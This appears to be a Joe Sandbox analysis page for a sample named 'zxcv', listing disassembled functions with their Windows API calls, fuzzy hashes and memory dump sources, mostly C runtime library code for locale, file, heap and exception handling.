Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: db9efb83dca73cb46f6a4f6979196eb63b253840ff8fd1bca00189845e4ec043
Instruction ID: eafd8d86c409f73c01280346bc694229c1bba65fdcd07fb19c2c210a62a23941
Opcode Fuzzy Hash: db9efb83dca73cb46f6a4f6979196eb63b253840ff8fd1bca00189845e4ec043
Instruction Fuzzy Hash: 3F21D330A102199BCF19CF29DC84AEDB7FAEB49306F6440A9ED06D7215E630DD56CF64

Function 00255CE5 Relevance: 2.6, APIs: 2, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE(00000000,00000000,CF830579,?,00255BCC,00000000,CF830579,0026D7D0,0000000C,00255C88,0024B811,?), ref: 00255D3B
GetLastError.KERNEL32(?,00255BCC,00000000,CF830579,0026D7D0,0000000C,00255C88,0024B811,?), ref: 00255D45

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 2b4318640734899505a74a75c200eeee1ecb8e457987a518d13938f2db333551
Instruction ID: bc2ddb48aaae64623942782728f14bb724aec3d112427635fa15fc1df5eceeee
Opcode Fuzzy Hash: 2b4318640734899505a74a75c200eeee1ecb8e457987a518d13938f2db333551
Instruction Fuzzy Hash: BE116F33739A3026C6252B34BC1977DB7599F92736F290119FC158B2C1DF718CA88A58

Function 0025A156 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsopen_s.LIBCMT ref: 0025A190

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 0d01384bcbabc5361b2e402d3ff339b009e41599ca1e89ab5e5c18e33a07a92d
Instruction ID: 4dd47af1cd631da9db25fa5bf1da32aeceff19587d8665065a9057b24ae01461
Opcode Fuzzy Hash: 0d01384bcbabc5361b2e402d3ff339b009e41599ca1e89ab5e5c18e33a07a92d
Instruction Fuzzy Hash: 3F112771A0420AAFCF05DF58E94199B7BF8EF48314F1440A9F809EB251D670EA25DBA9

Function 00258275 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,009BCB50,00000000,?,0024679F,009BCB50,?,00243360,00000008,00000000,009BCB50), ref: 002582A7

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 427d9de6eff5d76f489c4bec8489eaecebf0eb0557b42d25309092c856f2ce1d
Instruction ID: 3998476a9f67e50bb6dcdc1d3204282380b39ab35b3017df48810d20497c9bb8
Opcode Fuzzy Hash: 427d9de6eff5d76f489c4bec8489eaecebf0eb0557b42d25309092c856f2ce1d
Instruction Fuzzy Hash: B0E0EC35631A9166D7312A75AD0575A3F48AF43363F090020FD40F60C0CFF0DC28459D

Function 00260B42 Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,00000000,?,00260F32,?,?,00000000,?,00260F32,?,0000000C), ref: 00260B5F

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7553e3ac6defb17c24ebe644da4109e2ca0938b8ee6fecac3d2409a39311af9d
Instruction ID: 7e4bc14e75cbf8fe8bd3e3125f751a7375a42a8bf3accdb91a6ff16282a83721
Opcode Fuzzy Hash: 7553e3ac6defb17c24ebe644da4109e2ca0938b8ee6fecac3d2409a39311af9d
Instruction Fuzzy Hash: 2CD06C3201010DBBDF029F84ED06EDA3FAAFB48714F018040FA5856020C772E861AB90

Non-executed Functions

Function 0025DF31 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,O%,00000002,00000000,?,?,?,0025E24F,?,00000000), ref: 0025DFCA
GetLocaleInfoW.KERNEL32(?,20001004,O%,00000002,00000000,?,?,?,0025E24F,?,00000000), ref: 0025DFF3
GetACP.KERNEL32(?,?,0025E24F,?,00000000), ref: 0025E008

Strings

OCP, xrefs: 0025DF85
O%, xrefs: 0025DFE4, 0025E001, 0025DFBB, 0025DFD4, 0025DFBE, 0025DFE7
ACP, xrefs: 0025DF4F

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP$O%
API String ID: 2299586839-2409206020
Opcode ID: cf472513a173241df1474df50368d19017818f8071174ff4698db1f13b4a65d9
Instruction ID: 7f541d057c594448eb1439e9737bb209713a754a7c654b3f46fa60a6c144f738
Opcode Fuzzy Hash: cf472513a173241df1474df50368d19017818f8071174ff4698db1f13b4a65d9
Instruction Fuzzy Hash: 9921C832630102E6EB34CF64C904AA773A6FB54B56B668064FD0BE7644F772DE58C358

Function 0025E106 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00253E60: GetLastError.KERNEL32(?,00000008,0025A6B1,00000000,0024B2C0), ref: 00253E64
Part of subcall function 00253E60: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 00253F06

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0025E212
IsValidCodePage.KERNEL32(00000000), ref: 0025E25B
IsValidLocale.KERNEL32(?,00000001), ref: 0025E26A
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0025E2B2
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0025E2D1

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 16a49c5c15166c08dc0febc7916ab5e2fa1f81e0fc1737e7899f668072301457
Instruction ID: ab66f77608a96c0d31c0bc6419d35ebc77078a7b6398a3a3559298d253274dd0
Opcode Fuzzy Hash: 16a49c5c15166c08dc0febc7916ab5e2fa1f81e0fc1737e7899f668072301457
Instruction Fuzzy Hash: 9E51B571A202169BEF24DFA4DC45ABA77B8FF08701F054065FD14E7194DBB0DE288B65

Function 0025D7A2 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00253E60: GetLastError.KERNEL32(?,00000008,0025A6B1,00000000,0024B2C0), ref: 00253E64
Part of subcall function 00253E60: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 00253F06

GetACP.KERNEL32(?,?,?,?,?,?,00251F39,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0025D863
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00251F39,?,?,?,00000055,?,-00000050,?,?), ref: 0025D88E
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0025D9F1

Strings

utf8, xrefs: 0025D960

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: 6706e2eef520ff185f2bc883a647f9c9eb496f4e258616a884749c0d990fc0be
Instruction ID: 0b16a43bd9ab129229ae18b5c355a0d0380eb0e550a9630d6d832b5f023905a5
Opcode Fuzzy Hash: 6706e2eef520ff185f2bc883a647f9c9eb496f4e258616a884749c0d990fc0be
Instruction Fuzzy Hash: 44714671630203AADB34AF35CC46BA7B3A8EF45716F144429FD05D7181FA70ED698BA8

Function 00258484 Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00258511

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: e62bf9f7c864d3f4a84d5b345bca12da4174e8a1b17754eb5299086a5322faff
Instruction ID: 190292da41c9497c651342aff6dc4588b22cbead920290db563d1992eb385c10
Opcode Fuzzy Hash: e62bf9f7c864d3f4a84d5b345bca12da4174e8a1b17754eb5299086a5322faff
Instruction Fuzzy Hash: EEB16B329202469FDB15CF68C8817FEFBA5EF59301F258166EC01BB241DAB4DD29CB64

Function 00283A4D Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00283ADA

Memory Dump Source

Source File: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 2105af1ce281aa8cf08cd6a1838856530ae0e12a9ea78a25eca6150783de226d
Instruction ID: b7656f542582520cf902a5e8a0094534c9ab5c671429773c0d0d159f2fbebcab
Opcode Fuzzy Hash: 2105af1ce281aa8cf08cd6a1838856530ae0e12a9ea78a25eca6150783de226d
Instruction Fuzzy Hash: 97B19E769262469FDF15DF28C8817EEBBE4EF05700F14816AE801AB3C1D234DE21CB60

Function 002473CB Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 002473D7
IsDebuggerPresent.KERNEL32 ref: 002474A3
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 002474BC
UnhandledExceptionFilter.KERNEL32(?), ref: 002474C6

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 4dccc5994c725e719db8ce3a236de8cf8c878e0758f93f5452cfc7ece116182c
Instruction ID: 87114d936faf9ee079ba3727eb6469cff7a463087c6607828794e682b043d0aa
Opcode Fuzzy Hash: 4dccc5994c725e719db8ce3a236de8cf8c878e0758f93f5452cfc7ece116182c
Instruction Fuzzy Hash: 7E310A75D15229DBDF24EF64D949BCDBBB8AF08300F1041EAE51CAB250E7719A84CF45

Function 0025DBB5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00253E60: GetLastError.KERNEL32(?,00000008,0025A6B1,00000000,0024B2C0), ref: 00253E64
Part of subcall function 00253E60: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 00253F06

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0025DC09
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0025DC53
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0025DD19

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 7212576aef4a864aabf12a78098e93c3b151f18c2db2954e603e12e6c4a92f2d
Instruction ID: f827a984e0bcda8f3a0511761b9964b101bb48532065b7ed972a965394f7e4bb
Opcode Fuzzy Hash: 7212576aef4a864aabf12a78098e93c3b151f18c2db2954e603e12e6c4a92f2d
Instruction Fuzzy Hash: 4261AF725211179BDB389F28CD82BBA77B8FF04302F1041BAED05C6185EB74D9A9CB58

Function 0024B143 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0024B23B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0024B245
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0024B252

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: cd937dcf9160fd96e56003aa740ccc026e3c0e97286aacef2c486d6b7c07fc74
Instruction ID: dc4bcef6f04a47d7bd41867958584836a21d7d78a3b0ab132d98a49398784205
Opcode Fuzzy Hash: cd937dcf9160fd96e56003aa740ccc026e3c0e97286aacef2c486d6b7c07fc74
Instruction Fuzzy Hash: 8931E5749112289BCB25DF24D9887CDBBB8BF08710F5041DAE81CA7260E7709F958F44

Function 0025DA8F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00253E60: GetLastError.KERNEL32(?,00000008,0025A6B1,00000000,0024B2C0), ref: 00253E64
Part of subcall function 00253E60: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 00253F06

EnumSystemLocalesW.KERNEL32(0025DBB5,00000001,00000000,?,-00000050,?,0025E1E6,00000000,?,?,?,00000055,?), ref: 0025DB01

Strings

%, xrefs: 0025DAD6

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID: %
API String ID: 2417226690-826181748
Opcode ID: 0011c9d6766d1f0aba9dc3a399a19e28cd4808a39a7c5fa54b53daae8cd59b2a
Instruction ID: 26f9844c599cdf1fa741f6023f1007abfb12562da68f2097fc21f26501117b11
Opcode Fuzzy Hash: 0011c9d6766d1f0aba9dc3a399a19e28cd4808a39a7c5fa54b53daae8cd59b2a
Instruction Fuzzy Hash: 3B114C3B2143029FDB28AF38D89157AB792FF80369B15442CED8687740D771B956CB44

Function 00255626 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00252A9F,?,20001004,00000000,00000002,?,?,002520A1), ref: 0025565A

Strings

u:$, xrefs: 00255645

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: InfoLocale
String ID: u:$
API String ID: 2299586839-3033614593
Opcode ID: f5d4afdedaf198a4610c1428ff556be0bc44053a6d74c3453242e6715b3fae6c
Instruction ID: ac74d681dea98f1ca3da2bfdd51b04623db4ef1c12a1180ad50ca485d9ef6cf8
Opcode Fuzzy Hash: f5d4afdedaf198a4610c1428ff556be0bc44053a6d74c3453242e6715b3fae6c
Instruction Fuzzy Hash: 26E01A31510629FBCF122F61EC18B9E7E19AB44B61F448010FD0566221CB71A934AA9D

Function 0025ADB8 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86aea81e9b4cbec1291082fe67e7e3ed3c83c65b8ccdd9d3d66616c643d285d0
Instruction ID: ad501a0d0fcba69a78f2f273b3702307986a33bdf6d24aa0f07d4952d8f85613
Opcode Fuzzy Hash: 86aea81e9b4cbec1291082fe67e7e3ed3c83c65b8ccdd9d3d66616c643d285d0
Instruction Fuzzy Hash: 7441C6B581521DAFCF20DF69CC8AAAABBB8EF45305F1442D9E84CD3201DA359E948F54

Function 0025DE08 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00253E60: GetLastError.KERNEL32(?,00000008,0025A6B1,00000000,0024B2C0), ref: 00253E64
Part of subcall function 00253E60: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 00253F06

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0025DE5C

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: e57c9aa3ebd359876fdfcc2089c4176ae6aba6d443c2f5ef260eb13989bef2ec
Instruction ID: e401536838b61e7921ceb5ced4f27be8d4b256c7716e3e21fff359f5e1437fbc
Opcode Fuzzy Hash: e57c9aa3ebd359876fdfcc2089c4176ae6aba6d443c2f5ef260eb13989bef2ec
Instruction Fuzzy Hash: 0621C572625207ABDB29AE25DC43A7B73A8EF14316F10407AFD01DB151EB74ED28CB58

Function 0025E037 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00253E60: GetLastError.KERNEL32(?,00000008,0025A6B1,00000000,0024B2C0), ref: 00253E64
Part of subcall function 00253E60: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 00253F06

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0025DDD1,00000000,00000000,?), ref: 0025E063

Memory Dump Source

Source File: 00000008.00000002.2864339286.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000008.00000002.2864291058.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864407244.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864446927.000000000026F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864560357.000000000034B000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864601975.000000000034D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2864670138.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_zxcv.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
